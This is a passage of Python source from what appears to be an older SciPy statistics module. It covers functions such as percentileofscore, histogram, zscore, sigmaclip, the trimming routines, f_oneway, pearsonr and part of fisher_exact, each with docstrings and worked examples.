This optional parameter specifies the interpretation of the
resulting score:
- "rank": Average percentage ranking of score. In case of
multiple matches, average the percentage rankings of
all matching scores.
- "weak": This kind corresponds to the definition of a cumulative
distribution function. A percentileofscore of 80%
means that 80% of values are less than or equal
to the provided score.
- "strict": Similar to "weak", except that only values that are
strictly less than the given score are counted.
- "mean": The average of the "weak" and "strict" scores, often used in
testing. See
http://en.wikipedia.org/wiki/Percentile_rank
Returns
-------
pcos : float
Percentile-position of score (0-100) relative to `a`.
See Also
--------
numpy.percentile
Examples
--------
Three-quarters of the given values lie below a given score:
>>> from scipy import stats
>>> stats.percentileofscore([1, 2, 3, 4], 3)
75.0
With multiple matches, note how the scores of the two matches, 0.6
and 0.8 respectively, are averaged:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3)
70.0
Only 2/5 values are strictly less than 3:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='strict')
40.0
But 4/5 values are less than or equal to 3:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='weak')
80.0
The average between the weak and the strict scores is
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='mean')
60.0
"""
a = np.array(a)
n = len(a)
if kind == 'rank':
if not np.any(a == score):
a = np.append(a, score)
a_len = np.array(list(range(len(a))))
else:
a_len = np.array(list(range(len(a)))) + 1.0
a = np.sort(a)
idx = [a == score]
pct = (np.mean(a_len[idx]) / n) * 100.0
return pct
elif kind == 'strict':
return np.sum(a < score) / float(n) * 100
elif kind == 'weak':
return np.sum(a <= score) / float(n) * 100
elif kind == 'mean':
return (np.sum(a < score) + np.sum(a <= score)) * 50 / float(n)
else:
raise ValueError("kind can only be 'rank', 'strict', 'weak' or 'mean'")
@np.deprecate(message=("scipy.stats.histogram2 is deprecated in scipy 0.16.0; "
"use np.histogram2d instead"))
def histogram2(a, bins):
"""
Compute histogram using divisions in bins.
Count the number of times values from array `a` fall into
numerical ranges defined by `bins`. Range x is given by
bins[x] <= range_x < bins[x+1] where x =0,N and N is the
length of the `bins` array. The last range is given by
bins[N] <= range_N < infinity. Values less than bins[0] are
not included in the histogram.
Parameters
----------
a : array_like of rank 1
The array of values to be assigned into bins
bins : array_like of rank 1
Defines the ranges of values to use during histogramming.
Returns
-------
histogram2 : ndarray of rank 1
Each value represents the occurrences for a given bin (range) of
values.
"""
# comment: probably obsoleted by numpy.histogram()
n = np.searchsorted(np.sort(a), bins)
n = np.concatenate([n, [len(a)]])
return n[1:] - n[:-1]
def histogram(a, numbins=10, defaultlimits=None, weights=None, printextras=False):
"""
Separates the range into several bins and returns the number of instances
in each bin.
Parameters
----------
a : array_like
Array of scores which will be put into bins.
numbins : int, optional
The number of bins to use for the histogram. Default is 10.
defaultlimits : tuple (lower, upper), optional
The lower and upper values for the range of the histogram.
If no value is given, a range slightly larger than the range of the
values in a is used. Specifically ``(a.min() - s, a.max() + s)``,
where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
weights : array_like, optional
The weights for each value in `a`. Default is None, which gives each
value a weight of 1.0
printextras : bool, optional
If True, if there are extra points (i.e. the points that fall outside
the bin limits) a warning is raised saying how many of those points
there are. Default is False.
Returns
-------
count : ndarray
Number of points (or sum of weights) in each bin.
lowerlimit : float
Lowest value of histogram, the lower limit of the first bin.
binsize : float
The size of the bins (all bins have the same size).
extrapoints : int
The number of points outside the range of the histogram.
See Also
--------
numpy.histogram
Notes
-----
This histogram is based on numpy's histogram but has a larger range by
default if default limits is not set.
"""
a = np.ravel(a)
if defaultlimits is None:
if a.size == 0:
# handle empty arrays. Undetermined range, so use 0-1.
defaultlimits = (0, 1)
else:
# no range given, so use values in `a`
data_min = a.min()
data_max = a.max()
# Have bins extend past min and max values slightly
s = (data_max - data_min) / (2. * (numbins - 1.))
defaultlimits = (data_min - s, data_max + s)
# use numpy's histogram method to compute bins
hist, bin_edges = np.histogram(a, bins=numbins, range=defaultlimits,
weights=weights)
# hist are not always floats, convert to keep with old output
hist = np.array(hist, dtype=float)
# fixed width for bins is assumed, as numpy's histogram gives
# fixed width bins for int values for 'bins'
binsize = bin_edges[1] - bin_edges[0]
# calculate number of extra points
extrapoints = len([v for v in a
if defaultlimits[0] > v or v > defaultlimits[1]])
if extrapoints > 0 and printextras:
warnings.warn("Points outside given histogram range = %s"
% extrapoints)
HistogramResult = namedtuple('HistogramResult', ('count', 'lowerlimit',
'binsize', 'extrapoints'))
return HistogramResult(hist, defaultlimits[0], binsize, extrapoints)
def cumfreq(a, numbins=10, defaultreallimits=None, weights=None):
"""
Returns a cumulative frequency histogram, using the histogram function.
A cumulative histogram is a mapping that counts the cumulative number of
observations in all of the bins up to the specified bin.
Parameters
----------
a : array_like
Input array.
numbins : int, optional
The number of bins to use for the histogram. Default is 10.
defaultreallimits : tuple (lower, upper), optional
The lower and upper values for the range of the histogram.
If no value is given, a range slightly larger than the range of the
values in `a` is used. Specifically ``(a.min() - s, a.max() + s)``,
where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
weights : array_like, optional
The weights for each value in `a`. Default is None, which gives each
value a weight of 1.0
Returns
-------
cumcount : ndarray
Binned values of cumulative frequency.
lowerlimit : float
Lower real limit
binsize : float
Width of each bin.
extrapoints : int
Extra points.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from scipy import stats
>>> x = [1, 4, 2, 1, 3, 1]
>>> res = stats.cumfreq(x, numbins=4, defaultreallimits=(1.5, 5))
>>> res.cumcount
array([ 1., 2., 3., 3.])
>>> res.extrapoints
3
Create a normal distribution with 1000 random values
>>> rng = np.random.RandomState(seed=12345)
>>> samples = stats.norm.rvs(size=1000, random_state=rng)
Calculate cumulative frequencies
>>> res = stats.cumfreq(samples, numbins=25)
Calculate space of values for x
>>> x = res.lowerlimit + np.linspace(0, res.binsize*res.cumcount.size,
... res.cumcount.size)
Plot histogram and cumulative histogram
>>> fig = plt.figure(figsize=(10, 4))
>>> ax1 = fig.add_subplot(1, 2, 1)
>>> ax2 = fig.add_subplot(1, 2, 2)
>>> ax1.hist(samples, bins=25)
>>> ax1.set_title('Histogram')
>>> ax2.bar(x, res.cumcount, width=res.binsize)
>>> ax2.set_title('Cumulative histogram')
>>> ax2.set_xlim([x.min(), x.max()])
>>> plt.show()
"""
h, l, b, e = histogram(a, numbins, defaultreallimits, weights=weights)
cumhist = np.cumsum(h * 1, axis=0)
CumfreqResult = namedtuple('CumfreqResult', ('cumcount', 'lowerlimit',
'binsize', 'extrapoints'))
return CumfreqResult(cumhist, l, b, e)
def relfreq(a, numbins=10, defaultreallimits=None, weights=None):
"""
Returns a relative frequency histogram, using the histogram function.
A relative frequency histogram is a mapping of the number of
observations in each of the bins relative to the total of observations.
Parameters
----------
a : array_like
Input array.
numbins : int, optional
The number of bins to use for the histogram. Default is 10.
defaultreallimits : tuple (lower, upper), optional
The lower and upper values for the range of the histogram.
If no value is given, a range slightly larger than the range of the
values in a is used. Specifically ``(a.min() - s, a.max() + s)``,
where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
weights : array_like, optional
The weights for each value in `a`. Default is None, which gives each
value a weight of 1.0
Returns
-------
frequency : ndarray
Binned values of relative frequency.
lowerlimit : float
Lower real limit
binsize : float
Width of each bin.
extrapoints : int
Extra points.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from scipy import stats
>>> a = np.array([2, 4, 1, 2, 3, 2])
>>> res = stats.relfreq(a, numbins=4)
>>> res.frequency
array([ 0.16666667, 0.5 , 0.16666667, 0.16666667])
>>> np.sum(res.frequency) # relative frequencies should add up to 1
1.0
Create a normal distribution with 1000 random values
>>> rng = np.random.RandomState(seed=12345)
>>> samples = stats.norm.rvs(size=1000, random_state=rng)
Calculate relative frequencies
>>> res = stats.relfreq(samples, numbins=25)
Calculate space of values for x
>>> x = res.lowerlimit + np.linspace(0, res.binsize*res.frequency.size,
... res.frequency.size)
Plot relative frequency histogram
>>> fig = plt.figure(figsize=(5, 4))
>>> ax = fig.add_subplot(1, 1, 1)
>>> ax.bar(x, res.frequency, width=res.binsize)
>>> ax.set_title('Relative frequency histogram')
>>> ax.set_xlim([x.min(), x.max()])
>>> plt.show()
"""
a = np.asanyarray(a)
h, l, b, e = histogram(a, numbins, defaultreallimits, weights=weights)
h = h / float(a.shape[0])
RelfreqResult = namedtuple('RelfreqResult', ('frequency', 'lowerlimit',
'binsize', 'extrapoints'))
return RelfreqResult(h, l, b, e)
#####################################
# VARIABILITY FUNCTIONS #
#####################################
def obrientransform(*args):
"""
Computes the O'Brien transform on input data (any number of arrays).
Used to test for homogeneity of variance prior to running one-way stats.
Each array in ``*args`` is one level of a factor.
If `f_oneway` is run on the transformed data and found significant,
the variances are unequal. From Maxwell and Delaney [1]_, p.112.
Parameters
----------
args : tuple of array_like
Any number of arrays.
Returns
-------
obrientransform : ndarray
Transformed data for use in an ANOVA. The first dimension
of the result corresponds to the sequence of transformed
arrays. If the arrays given are all 1-D of the same length,
the return value is a 2-D array; otherwise it is a 1-D array
of type object, with each element being an ndarray.
References
----------
.. [1] S. E. Maxwell and H. D. Delaney, "Designing Experiments and
Analyzing Data: A Model Comparison Perspective", Wadsworth, 1990.
Examples
--------
We'll test the following data sets for differences in their variance.
>>> x = [10, 11, 13, 9, 7, 12, 12, 9, 10]
>>> y = [13, 21, 5, 10, 8, 14, 10, 12, 7, 15]
Apply the O'Brien transform to the data.
>>> from scipy.stats import obrientransform
>>> tx, ty = obrientransform(x, y)
Use `scipy.stats.f_oneway` to apply a one-way ANOVA test to the
transformed data.
>>> from scipy.stats import f_oneway
>>> F, p = f_oneway(tx, ty)
>>> p
0.1314139477040335
If we require that ``p < 0.05`` for significance, we cannot conclude
that the variances are different.
"""
TINY = np.sqrt(np.finfo(float).eps)
# `arrays` will hold the transformed arguments.
arrays = []
for arg in args:
a = np.asarray(arg)
n = len(a)
mu = np.mean(a)
sq = (a - mu)**2
sumsq = sq.sum()
# The O'Brien transform.
t = ((n - 1.5) * n * sq - 0.5 * sumsq) / ((n - 1) * (n - 2))
# Check that the mean of the transformed data is equal to the
# original variance.
var = sumsq / (n - 1)
if abs(var - np.mean(t)) > TINY:
raise ValueError('Lack of convergence in obrientransform.')
arrays.append(t)
# If the arrays are not all the same shape, calling np.array(arrays)
# creates a 1-D array with dtype `object` in numpy 1.6+. In numpy
# 1.5.x, it raises an exception. To work around this, we explicitly
# set the dtype to `object` when the arrays are not all the same shape.
if len(arrays) < 2 or all(x.shape == arrays[0].shape for x in arrays[1:]):
dt = None
else:
dt = object
return np.array(arrays, dtype=dt)
@np.deprecate(message="scipy.stats.signaltonoise is deprecated in scipy 0.16.0")
def signaltonoise(a, axis=0, ddof=0):
"""
The signal-to-noise ratio of the input data.
Returns the signal-to-noise ratio of `a`, here defined as the mean
divided by the standard deviation.
Parameters
----------
a : array_like
An array_like object containing the sample data.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Degrees of freedom correction for standard deviation. Default is 0.
Returns
-------
s2n : ndarray
The mean to standard deviation ratio(s) along `axis`, or 0 where the
standard deviation is 0.
"""
a = np.asanyarray(a)
m = a.mean(axis)
sd = a.std(axis=axis, ddof=ddof)
return np.where(sd == 0, 0, m/sd)
def sem(a, axis=0, ddof=1, nan_policy='propagate'):
"""
Calculates the standard error of the mean (or standard error of
measurement) of the values in the input array.
Parameters
----------
a : array_like
An array containing the values for which the standard error is
returned.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Delta degrees-of-freedom. How many degrees of freedom to adjust
for bias in limited samples relative to the population estimate
of variance. Defaults to 1.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
s : ndarray or float
The standard error of the mean in the sample(s), along the input axis.
Notes
-----
The default value for `ddof` is different to the default (0) used by other
ddof containing routines, such as np.std nd stats.nanstd.
Examples
--------
Find standard error along the first axis:
>>> from scipy import stats
>>> a = np.arange(20).reshape(5,4)
>>> stats.sem(a)
array([ 2.8284, 2.8284, 2.8284, 2.8284])
Find standard error across the whole array, using n degrees of freedom:
>>> stats.sem(a, axis=None, ddof=0)
1.2893796958227628
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.sem(a, axis, ddof)
if contains_nan and nan_policy == 'propagate':
return np.nan
n = a.shape[axis]
s = np.std(a, axis=axis, ddof=ddof) / np.sqrt(n)
return s
def zscore(a, axis=0, ddof=0):
"""
Calculates the z score of each value in the sample, relative to the sample
mean and standard deviation.
Parameters
----------
a : array_like
An array like object containing the sample data.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Degrees of freedom correction in the calculation of the
standard deviation. Default is 0.
Returns
-------
zscore : array_like
The z-scores, standardized by mean and standard deviation of input
array `a`.
Notes
-----
This function preserves ndarray subclasses, and works also with
matrices and masked arrays (it uses `asanyarray` instead of `asarray`
for parameters).
Examples
--------
>>> a = np.array([ 0.7972, 0.0767, 0.4383, 0.7866, 0.8091, 0.1954,
... 0.6307, 0.6599, 0.1065, 0.0508])
>>> from scipy import stats
>>> stats.zscore(a)
array([ 1.1273, -1.247 , -0.0552, 1.0923, 1.1664, -0.8559, 0.5786,
0.6748, -1.1488, -1.3324])
Computing along a specified axis, using n-1 degrees of freedom (``ddof=1``)
to calculate the standard deviation:
>>> b = np.array([[ 0.3148, 0.0478, 0.6243, 0.4608],
... [ 0.7149, 0.0775, 0.6072, 0.9656],
... [ 0.6341, 0.1403, 0.9759, 0.4064],
... [ 0.5918, 0.6948, 0.904 , 0.3721],
... [ 0.0921, 0.2481, 0.1188, 0.1366]])
>>> stats.zscore(b, axis=1, ddof=1)
array([[-0.19264823, -1.28415119, 1.07259584, 0.40420358],
[ 0.33048416, -1.37380874, 0.04251374, 1.00081084],
[ 0.26796377, -1.12598418, 1.23283094, -0.37481053],
[-0.22095197, 0.24468594, 1.19042819, -1.21416216],
[-0.82780366, 1.4457416 , -0.43867764, -0.1792603 ]])
"""
a = np.asanyarray(a)
mns = a.mean(axis=axis)
sstd = a.std(axis=axis, ddof=ddof)
if axis and mns.ndim < a.ndim:
return ((a - np.expand_dims(mns, axis=axis)) /
np.expand_dims(sstd, axis=axis))
else:
return (a - mns) / sstd
def zmap(scores, compare, axis=0, ddof=0):
"""
Calculates the relative z-scores.
Returns an array of z-scores, i.e., scores that are standardized to zero
mean and unit variance, where mean and variance are calculated from the
comparison array.
Parameters
----------
scores : array_like
The input for which z-scores are calculated.
compare : array_like
The input from which the mean and standard deviation of the
normalization are taken; assumed to have the same dimension as
`scores`.
axis : int or None, optional
Axis over which mean and variance of `compare` are calculated.
Default is 0. If None, compute over the whole array `scores`.
ddof : int, optional
Degrees of freedom correction in the calculation of the
standard deviation. Default is 0.
Returns
-------
zscore : array_like
Z-scores, in the same shape as `scores`.
Notes
-----
This function preserves ndarray subclasses, and works also with
matrices and masked arrays (it uses `asanyarray` instead of `asarray`
for parameters).
Examples
--------
>>> from scipy.stats import zmap
>>> a = [0.5, 2.0, 2.5, 3]
>>> b = [0, 1, 2, 3, 4]
>>> zmap(a, b)
array([-1.06066017, 0. , 0.35355339, 0.70710678])
"""
scores, compare = map(np.asanyarray, [scores, compare])
mns = compare.mean(axis=axis)
sstd = compare.std(axis=axis, ddof=ddof)
if axis and mns.ndim < compare.ndim:
return ((scores - np.expand_dims(mns, axis=axis)) /
np.expand_dims(sstd, axis=axis))
else:
return (scores - mns) / sstd
#####################################
# TRIMMING FUNCTIONS #
#####################################
@np.deprecate(message="stats.threshold is deprecated in scipy 0.17.0")
def threshold(a, threshmin=None, threshmax=None, newval=0):
"""
Clip array to a given value.
Similar to numpy.clip(), except that values less than `threshmin` or
greater than `threshmax` are replaced by `newval`, instead of by
`threshmin` and `threshmax` respectively.
Parameters
----------
a : array_like
Data to threshold.
threshmin : float, int or None, optional
Minimum threshold, defaults to None.
threshmax : float, int or None, optional
Maximum threshold, defaults to None.
newval : float or int, optional
Value to put in place of values in `a` outside of bounds.
Defaults to 0.
Returns
-------
out : ndarray
The clipped input array, with values less than `threshmin` or
greater than `threshmax` replaced with `newval`.
Examples
--------
>>> a = np.array([9, 9, 6, 3, 1, 6, 1, 0, 0, 8])
>>> from scipy import stats
>>> stats.threshold(a, threshmin=2, threshmax=8, newval=-1)
array([-1, -1, 6, 3, -1, 6, -1, -1, -1, 8])
"""
a = asarray(a).copy()
mask = zeros(a.shape, dtype=bool)
if threshmin is not None:
mask |= (a < threshmin)
if threshmax is not None:
mask |= (a > threshmax)
a[mask] = newval
return a
def sigmaclip(a, low=4., high=4.):
"""
Iterative sigma-clipping of array elements.
The output array contains only those elements of the input array `c`
that satisfy the conditions ::
mean(c) - std(c)*low < c < mean(c) + std(c)*high
Starting from the full sample, all elements outside the critical range are
removed. The iteration continues with a new critical range until no
elements are outside the range.
Parameters
----------
a : array_like
Data array, will be raveled if not 1-D.
low : float, optional
Lower bound factor of sigma clipping. Default is 4.
high : float, optional
Upper bound factor of sigma clipping. Default is 4.
Returns
-------
clipped : ndarray
Input array with clipped elements removed.
lower : float
Lower threshold value use for clipping.
upper : float
Upper threshold value use for clipping.
Examples
--------
>>> from scipy.stats import sigmaclip
>>> a = np.concatenate((np.linspace(9.5, 10.5, 31),
... np.linspace(0, 20, 5)))
>>> fact = 1.5
>>> c, low, upp = sigmaclip(a, fact, fact)
>>> c
array([ 9.96666667, 10. , 10.03333333, 10. ])
>>> c.var(), c.std()
(0.00055555555555555165, 0.023570226039551501)
>>> low, c.mean() - fact*c.std(), c.min()
(9.9646446609406727, 9.9646446609406727, 9.9666666666666668)
>>> upp, c.mean() + fact*c.std(), c.max()
(10.035355339059327, 10.035355339059327, 10.033333333333333)
>>> a = np.concatenate((np.linspace(9.5, 10.5, 11),
... np.linspace(-100, -50, 3)))
>>> c, low, upp = sigmaclip(a, 1.8, 1.8)
>>> (c == np.linspace(9.5, 10.5, 11)).all()
True
"""
c = np.asarray(a).ravel()
delta = 1
while delta:
c_std = c.std()
c_mean = c.mean()
size = c.size
critlower = c_mean - c_std*low
critupper = c_mean + c_std*high
c = c[(c > critlower) & (c < critupper)]
delta = size - c.size
SigmaclipResult = namedtuple('SigmaclipResult', ('clipped', 'lower',
'upper'))
return SigmaclipResult(c, critlower, critupper)
def trimboth(a, proportiontocut, axis=0):
"""
Slices off a proportion of items from both ends of an array.
Slices off the passed proportion of items from both ends of the passed
array (i.e., with `proportiontocut` = 0.1, slices leftmost 10% **and**
rightmost 10% of scores). The trimmed values are the lowest and
highest ones.
Slices off less if proportion results in a non-integer slice index (i.e.,
conservatively slices off`proportiontocut`).
Parameters
----------
a : array_like
Data to trim.
proportiontocut : float
Proportion (in range 0-1) of total data set to trim of each end.
axis : int or None, optional
Axis along which to trim data. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
out : ndarray
Trimmed version of array `a`. The order of the trimmed content
is undefined.
See Also
--------
trim_mean
Examples
--------
>>> from scipy import stats
>>> a = np.arange(20)
>>> b = stats.trimboth(a, 0.1)
>>> b.shape
(16,)
"""
a = np.asarray(a)
if a.size == 0:
return a
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
lowercut = int(proportiontocut * nobs)
uppercut = nobs - lowercut
if (lowercut >= uppercut):
raise ValueError("Proportion too big.")
# np.partition is preferred but it only exist in numpy 1.8.0 and higher,
# in those cases we use np.sort
try:
atmp = np.partition(a, (lowercut, uppercut - 1), axis)
except AttributeError:
atmp = np.sort(a, axis)
sl = [slice(None)] * atmp.ndim
sl[axis] = slice(lowercut, uppercut)
return atmp[sl]
def trim1(a, proportiontocut, tail='right', axis=0):
"""
Slices off a proportion from ONE end of the passed array distribution.
If `proportiontocut` = 0.1, slices off 'leftmost' or 'rightmost'
10% of scores. The lowest or highest values are trimmed (depending on
the tail).
Slices off less if proportion results in a non-integer slice index
(i.e., conservatively slices off `proportiontocut` ).
Parameters
----------
a : array_like
Input array
proportiontocut : float
Fraction to cut off of 'left' or 'right' of distribution
tail : {'left', 'right'}, optional
Defaults to 'right'.
axis : int or None, optional
Axis along which to trim data. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
trim1 : ndarray
Trimmed version of array `a`. The order of the trimmed content is
undefined.
"""
a = np.asarray(a)
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
# avoid possible corner case
if proportiontocut >= 1:
return []
if tail.lower() == 'right':
lowercut = 0
uppercut = nobs - int(proportiontocut * nobs)
elif tail.lower() == 'left':
lowercut = int(proportiontocut * nobs)
uppercut = nobs
# np.partition is preferred but it only exist in numpy 1.8.0 and higher,
# in those cases we use np.sort
try:
atmp = np.partition(a, (lowercut, uppercut - 1), axis)
except AttributeError:
atmp = np.sort(a, axis)
return atmp[lowercut:uppercut]
def trim_mean(a, proportiontocut, axis=0):
"""
Return mean of array after trimming distribution from both tails.
If `proportiontocut` = 0.1, slices off 'leftmost' and 'rightmost' 10% of
scores. The input is sorted before slicing. Slices off less if proportion
results in a non-integer slice index (i.e., conservatively slices off
`proportiontocut` ).
Parameters
----------
a : array_like
Input array
proportiontocut : float
Fraction to cut off of both tails of the distribution
axis : int or None, optional
Axis along which the trimmed means are computed. Default is 0.
If None, compute over the whole array `a`.
Returns
-------
trim_mean : ndarray
Mean of trimmed array.
See Also
--------
trimboth
tmean : compute the trimmed mean ignoring values outside given `limits`.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.trim_mean(x, 0.1)
9.5
>>> x2 = x.reshape(5, 4)
>>> x2
array([[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[12, 13, 14, 15],
[16, 17, 18, 19]])
>>> stats.trim_mean(x2, 0.25)
array([ 8., 9., 10., 11.])
>>> stats.trim_mean(x2, 0.25, axis=1)
array([ 1.5, 5.5, 9.5, 13.5, 17.5])
"""
a = np.asarray(a)
if a.size == 0:
return np.nan
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
lowercut = int(proportiontocut * nobs)
uppercut = nobs - lowercut
if (lowercut > uppercut):
raise ValueError("Proportion too big.")
# np.partition is preferred but it only exist in numpy 1.8.0 and higher,
# in those cases we use np.sort
try:
atmp = np.partition(a, (lowercut, uppercut - 1), axis)
except AttributeError:
atmp = np.sort(a, axis)
sl = [slice(None)] * atmp.ndim
sl[axis] = slice(lowercut, uppercut)
return np.mean(atmp[sl], axis=axis)
def f_oneway(*args):
"""
Performs a 1-way ANOVA.
The one-way ANOVA tests the null hypothesis that two or more groups have
the same population mean. The test is applied to samples from two or
more groups, possibly with differing sizes.
Parameters
----------
sample1, sample2, ... : array_like
The sample measurements for each group.
Returns
-------
statistic : float
The computed F-value of the test.
pvalue : float
The associated p-value from the F-distribution.
Notes
-----
The ANOVA test has important assumptions that must be satisfied in order
for the associated p-value to be valid.
1. The samples are independent.
2. Each sample is from a normally distributed population.
3. The population standard deviations of the groups are all equal. This
property is known as homoscedasticity.
If these assumptions are not true for a given set of data, it may still be
possible to use the Kruskal-Wallis H-test (`scipy.stats.kruskal`) although
with some loss of power.
The algorithm is from Heiman[2], pp.394-7.
References
----------
.. [1] Lowry, Richard. "Concepts and Applications of Inferential
Statistics". Chapter 14.
http://faculty.vassar.edu/lowry/ch14pt1.html
.. [2] Heiman, G.W. Research Methods in Statistics. 2002.
.. [3] McDonald, G. H. "Handbook of Biological Statistics", One-way ANOVA.
http://http://www.biostathandbook.com/onewayanova.html
Examples
--------
>>> import scipy.stats as stats
[3]_ Here are some data on a shell measurement (the length of the anterior
adductor muscle scar, standardized by dividing by length) in the mussel
Mytilus trossulus from five locations: Tillamook, Oregon; Newport, Oregon;
Petersburg, Alaska; Magadan, Russia; and Tvarminne, Finland, taken from a
much larger data set used in McDonald et al. (1991).
>>> tillamook = [0.0571, 0.0813, 0.0831, 0.0976, 0.0817, 0.0859, 0.0735,
... 0.0659, 0.0923, 0.0836]
>>> newport = [0.0873, 0.0662, 0.0672, 0.0819, 0.0749, 0.0649, 0.0835,
... 0.0725]
>>> petersburg = [0.0974, 0.1352, 0.0817, 0.1016, 0.0968, 0.1064, 0.105]
>>> magadan = [0.1033, 0.0915, 0.0781, 0.0685, 0.0677, 0.0697, 0.0764,
... 0.0689]
>>> tvarminne = [0.0703, 0.1026, 0.0956, 0.0973, 0.1039, 0.1045]
>>> stats.f_oneway(tillamook, newport, petersburg, magadan, tvarminne)
F_onewayResult(statistic=7.1210194716424473, pvalue=0.00028122423145345439)
"""
args = [np.asarray(arg, dtype=float) for arg in args]
# ANOVA on N groups, each in its own array
num_groups = len(args)
alldata = np.concatenate(args)
bign = len(alldata)
# Determine the mean of the data, and subtract that from all inputs to a
# variance (via sum_of_sq / sq_of_sum) calculation. Variance is invariance
# to a shift in location, and centering all data around zero vastly
# improves numerical stability.
offset = alldata.mean()
alldata -= offset
sstot = _sum_of_squares(alldata) - (_square_of_sums(alldata) / float(bign))
ssbn = 0
for a in args:
ssbn += _square_of_sums(a - offset) / float(len(a))
# Naming: variables ending in bn/b are for "between treatments", wn/w are
# for "within treatments"
ssbn -= (_square_of_sums(alldata) / float(bign))
sswn = sstot - ssbn
dfbn = num_groups - 1
dfwn = bign - num_groups
msb = ssbn / float(dfbn)
msw = sswn / float(dfwn)
f = msb / msw
prob = special.fdtrc(dfbn, dfwn, f) # equivalent to stats.f.sf
F_onewayResult = namedtuple('F_onewayResult', ('statistic', 'pvalue'))
return F_onewayResult(f, prob)
def pearsonr(x, y):
"""
Calculates a Pearson correlation coefficient and the p-value for testing
non-correlation.
The Pearson correlation coefficient measures the linear relationship
between two datasets. Strictly speaking, Pearson's correlation requires
that each dataset be normally distributed. Like other correlation
coefficients, this one varies between -1 and +1 with 0 implying no
correlation. Correlations of -1 or +1 imply an exact linear
relationship. Positive correlations imply that as x increases, so does
y. Negative correlations imply that as x increases, y decreases.
The p-value roughly indicates the probability of an uncorrelated system
producing datasets that have a Pearson correlation at least as extreme
as the one computed from these datasets. The p-values are not entirely
reliable but are probably reasonable for datasets larger than 500 or so.
Parameters
----------
x : (N,) array_like
Input
y : (N,) array_like
Input
Returns
-------
(Pearson's correlation coefficient,
2-tailed p-value)
References
----------
http://www.statsoft.com/textbook/glosp.html#Pearson%20Correlation
"""
# x and y should have same length.
x = np.asarray(x)
y = np.asarray(y)
n = len(x)
mx = x.mean()
my = y.mean()
xm, ym = x - mx, y - my
r_num = np.add.reduce(xm * ym)
r_den = np.sqrt(_sum_of_squares(xm) * _sum_of_squares(ym))
r = r_num / r_den
# Presumably, if abs(r) > 1, then it is only some small artifact of floating
# point arithmetic.
r = max(min(r, 1.0), -1.0)
df = n - 2
if abs(r) == 1.0:
prob = 0.0
else:
t_squared = r**2 * (df / ((1.0 - r) * (1.0 + r)))
prob = _betai(0.5*df, 0.5, df/(df+t_squared))
return r, prob
def fisher_exact(table, alternative='two-sided'):
"""Performs a Fisher exact test on a 2x2 contingency table.
Parameters
----------
table : array_like of ints
A 2x2 contingency table. Elements should be non-negative integers.
alternative : {'two-sided', 'less', 'greater'}, optional
Which alternative hypothesis to the null hypothesis the test uses.
Default is 'two-sided'.
Returns
-------
oddsratio : float
This is prior odds ratio and not a posterior estimate.
p_value : float
P-value, the probability of obtaining a distribution at least as
extreme as the one that was actually observed, assuming that the
null hypothesis is true.
See Also
--------
chi2_contingency : Chi-square test of independence of variables in a
contingency table.
Notes
-----
The calculated odds ratio is different from the one R uses. This scipy
implementation returns the (more common) "unconditional Maximum
Likelihood Estimate", while R uses the "conditional Maximum Likelihood
Estimate".
For tables with large numbers, the (inexact) chi-square test implemented
in the function `chi2_contingency` can also be used.
Examples
--------
Say we spend a few days counting whales and sharks in the Atlantic and
Indian oceans. In the Atlantic ocean we find 8 whales and 1 shark, in the
Indian ocean 2 whales and 5 sharks. Then our contingency table is::
Atlantic Indian
whales 8 2
sharks 1 5
We use this table to find the p-value:
>>> import scipy.stats as stats
>>> oddsratio, pvalue = stats.fisher_exact([[8, 2], [1, 5]])
>>> pvalue
0.0349...
The probability that we would observe this or an even more imbalanced ratio
by chance is about 3.5%. A commonly used significance level is 5%--if we
adopt that, we can therefore conclude that our observed imbalance is
statistically significant; whales prefer the Atlantic while sharks prefer
the Indian ocean.
"""
hypergeom = distributions.hypergeom
c = np.asarray(table, dtype=np.int64) # int32 is not enough for the algorithm
if not c.shape == (2, 2):
raise ValueError("The input `table` must be of shape (2, 2).")
if np.any(c < 0):
raise ValueError("All values in `table` must be nonnegative.")
if 0 in c.sum(axis=0) or 0 in c.sum(axis=1):
# If both values in a row or column are zero, the p-value is 1 and
# the odds ratio is NaN.
return np.nan, 1.0
if c[1,0] > 0 and c[0,1] > 0:
oddsratio = c[0,0] * c[1,1] / float(c[1,0] * c[0,1])
else:
oddsratio = np.inf
n1 = c[0,0] + c[0,1]
n2 = c[1,0] + c[1,1]
n = c[0,0] + c[1,0]
def binary_search(n, n1, n2, side):
"""Binary search for where to begin lower/upper halves in two-sided
test.
"""
if side == "upper":
minval = mode
maxval = n
else:
minval = 0
maxval = mode
guess = -1
while maxval - minval > 1:
if maxval == minval + 1 and guess == minval:
guess = maxval
else:
guess = (maxval + minval) // 2
pguess = hypergeom.pmf(guess, n1 + n2, n1, n)
if side == "upper":
ng = guess - 1
else:
ng = guess + 1
if pguess <= pexact < hypergeom.pmf(ng, n1 + n2, n1, n):
break
elif pguess < pexact:
maxval = guess
else:
minval = guess
if guess == -1:
guess = minval
if side == "upper":
